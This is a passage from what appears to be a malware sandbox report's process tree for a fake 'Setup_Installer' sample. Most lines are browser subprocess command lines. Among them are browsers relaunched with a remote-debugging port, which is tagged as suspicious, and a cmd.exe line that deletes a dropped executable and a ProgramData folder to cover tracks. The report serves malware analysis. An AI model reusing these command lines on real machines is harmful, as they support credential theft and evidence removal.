                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3608,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:8
                                      10⤵
                                        PID:3132
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4596,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:8
                                        10⤵
                                          PID:4880
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4512,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:8
                                          10⤵
                                            PID:648
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5004 /prefetch:8
                                            10⤵
                                              PID:2948
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:8
                                              10⤵
                                                PID:276
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4280 /prefetch:8
                                                10⤵
                                                  PID:2088
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8
                                                  10⤵
                                                    PID:1696
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4668,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:2
                                                    10⤵
                                                    • Uses browser remote debugging
                                                    PID:1028
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:5532
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff843d33cb8,0x7ff843d33cc8,0x7ff843d33cd8
                                                    10⤵
                                                      PID:5548
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
                                                      10⤵
                                                        PID:5748
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:3
                                                        10⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5756
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:8
                                                        10⤵
                                                          PID:5772
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                                                          10⤵
                                                          • Uses browser remote debugging
                                                          PID:5960
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                                                          10⤵
                                                          • Uses browser remote debugging
                                                          PID:5968
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
                                                          10⤵
                                                            PID:2260
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2384 /prefetch:2
                                                            10⤵
                                                              PID:5164
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4108 /prefetch:2
                                                              10⤵
                                                                PID:5236
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3884 /prefetch:2
                                                                10⤵
                                                                  PID:5300
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4544 /prefetch:2
                                                                  10⤵
                                                                    PID:5368
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
                                                                    10⤵
                                                                    • Uses browser remote debugging
                                                                    PID:648
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
                                                                    10⤵
                                                                    • Uses browser remote debugging
                                                                    PID:5468
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:8
                                                                    10⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3484
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
                                                                    10⤵
                                                                    • Uses browser remote debugging
                                                                    PID:3056
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
                                                                    10⤵
                                                                    • Uses browser remote debugging
                                                                    PID:4688
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit
                                                                  9⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2940
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 10
                                                                    10⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Delays execution with timeout.exe
                                                                    PID:5416
                                                • C:\Windows\system32\vssvc.exe
                                                  C:\Windows\system32\vssvc.exe
                                                  1⤵
                                                  • Checks SCSI registry key(s)
                                                  PID:3440
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:4764
                                                  • C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"
                                                    1⤵
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1696
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""
                                                      2⤵
                                                      • Enumerates connected drives
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:1064
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                    1⤵
                                                      PID:760
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
                                                      1⤵
                                                        PID:3320
                                                      • C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"
                                                        1⤵
                                                        • Loads dropped DLL
                                                        • Enumerates connected drives
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3592
                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""
                                                          2⤵
                                                          • Enumerates connected drives
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:3088
                                                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                        1⤵
                                                          PID:276
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                          1⤵
                                                            PID:2420
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                            1⤵
                                                              PID:1856
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                              1⤵
                                                                PID:5280
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                  2⤵
                                                                  • Checks processor information in registry
                                                                  • Modifies registry class
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5308
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53b2cfa3-c6dc-4459-a3f0-989b7d44a8a4} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" gpu
                                                                    3⤵
                                                                      PID:1204
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2376 -parentBuildID 20240401114208 -prefsHandle 2360 -prefMapHandle 2356 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf096397-6ba0-45a4-8a9e-c0b5a4490a82} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" socket
                                                                      3⤵
                                                                      • Checks processor information in registry
                                                                      PID:6048
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2972 -childID 1 -isForBrowser -prefsHandle 1460 -prefMapHandle 3024 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae277e4c-48a9-45e7-bd73-afbae7f58b77} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab
                                                                      3⤵
                                                                        PID:5768
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3396 -childID 2 -isForBrowser -prefsHandle 3416 -prefMapHandle 3412 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {714733b9-c3ab-4c06-adda-0a34bb7a595c} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab
                                                                        3⤵
                                                                          PID:5632
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4196 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c22a62d8-e529-4418-b3df-2dcf3cfe647b} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" utility
                                                                          3⤵
                                                                          • Checks processor information in registry
                                                                          PID:5884
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -childID 3 -isForBrowser -prefsHandle 5324 -prefMapHandle 5276 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bd6f89e-dbe5-4c19-a396-e284d6039265} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab
                                                                          3⤵
                                                                            PID:3928
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 4 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0511404-fdd5-425a-b668-5e0171001ab3} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab
                                                                            3⤵
                                                                              PID:1592
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5744 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5668 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49d3de85-8fc8-44b0-8638-bfadee068132} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab
                                                                              3⤵
                                                                                PID:4888
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                            1⤵
                                                                            • Drops file in Windows directory
                                                                            • Enumerates system info in registry
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:4876
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff84424cc40,0x7ff84424cc4c,0x7ff84424cc58
                                                                              2⤵
                                                                                PID:2416
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2040,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2036 /prefetch:2
                                                                                2⤵
                                                                                  PID:1888
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1756,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3
                                                                                  2⤵
                                                                                    PID:1356
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1732,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2232 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4700
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1
                                                                                      2⤵
                                                                                        PID:2676
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:1
                                                                                        2⤵
                                                                                          PID:5588
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4404,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4388 /prefetch:1
                                                                                          2⤵
                                                                                            PID:1980
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:8
                                                                                            2⤵
                                                                                              PID:888
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
                                                                                              2⤵
                                                                                                PID:1544
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4584,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:5512
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3380,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:4908
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3392,i,3359630641732110110,11912338805013800781,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3356 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5492
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
